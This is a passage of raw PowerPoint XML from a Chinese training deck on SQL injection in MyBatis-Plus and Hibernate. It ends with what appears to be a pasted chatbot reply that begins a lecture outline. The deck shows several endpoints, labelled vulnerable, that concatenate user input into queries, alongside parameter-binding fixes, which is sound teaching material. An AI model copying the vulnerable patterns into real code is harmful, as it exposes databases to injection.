                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>对应前面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>applySql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>内部的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>{index}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>部分，可以进行预编译防止</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>@RequestMapping("/havingvuln")</a:t>
            </a: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mybatishavingvuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(String id) {</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("author").having("id &gt; " +id);</a:t>
            </a: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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    return list;</a:t>
            </a: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3108543"/>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order by</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isAsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>, R... columns)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>orderByAsc</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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>orderByDesc</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排序时不能进行预编译处理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故相关内容用户可控的话会存在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149" y="3794677"/>
            <a:ext cx="16700783" cy="7851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124754"/>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group By</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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(R... columns)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>分组：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>, ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>主要用于用于结合聚合函数，根据一个或多个列对结果集进行分组</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>@RequestMapping("/gropbycvuln")</a:t>
            </a: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mybatishsgropbycvuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(String column) {</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(column);</a:t>
            </a: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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    return list;</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如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>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注入的风险</a:t>
            </a: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notinsql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notInSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(R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notInSql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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>IN / NOT IN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column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>字段、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>inValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>字段可控的情况下存在注入风险。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>示例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>@RequestMapping("/insqlcvuln")</a:t>
            </a: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mybatisinsqlvuln</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column,String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> id) {</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column,"select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> id from tutorials where id &gt;" + id);</a:t>
            </a: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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    return list;</a:t>
            </a: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483209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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Wrapper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>自定义</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（特殊的预编译场景）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注解模式</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Wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>自定义模式下</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等会自动进行预编译，但若存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>last</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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orderby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>等未进行预编译方法，若相应数据用户可控仍会存在</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注入风险，风险</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>仍为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>中常见注入场景。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2.XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>模式的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注入问题与注解模式相同。</a:t>
            </a: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1295400"/>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四</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是一个开放源代码的对象关系映射框架，它对</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进行了非常轻量级的对象封装，使得</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程序员可以随心所欲的使用对象编程思维来操纵数据库。</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可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">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语句，也可以直接执行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语句，无论是哪种方式都有可能导致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正确使用以下几种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">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参数绑定的方式可以有效避免注入的产生：</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命名参数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>named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:name",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("name", parameter);</a:t>
            </a:r>
          </a:p>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位置参数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Positional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(1, parameter);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea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rPr>
              <a:t>命名参数列表（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>named parameter list</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List&lt;String&gt; names = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Arrays.asList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>("g1ts", "g2ts");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in (:names)",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("names", names);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea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rPr>
              <a:t>类实例（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>JavaBean</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user1.setName("g1ts");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=:name",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query.setProperties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(user1);</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002738"/>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5.HQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>拼接方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>​ 这种方式是最常用，而且容易忽视且容易被注入的，通常做法就是对参数的特殊字符进行过滤，推荐大家使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>工具包的</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方法对参数进行过滤：</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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>org.apache.commons.lang.StringEscapeUtils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public static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>args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  String str = </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System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(str);</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SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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支持使用原生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语句执行，所以其风险和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是一致的，直接使用拼接的方法时会导致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语句如下：</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Query&lt;People&gt;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username = '" + username + "' and password = '" + password + "'");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>正确写法：</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name = :name");</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name",parameter</a:t>
            </a:r>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55709" y="2580640"/>
            <a:ext cx="18673702" cy="20036254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>当然，我可以为你提供一个关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞原理和实例的中文</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>讲义。下面是一份详细的讲义大纲，你可以根据需要进行扩展和调整。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>讲义：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞的原理和实例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>引言</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
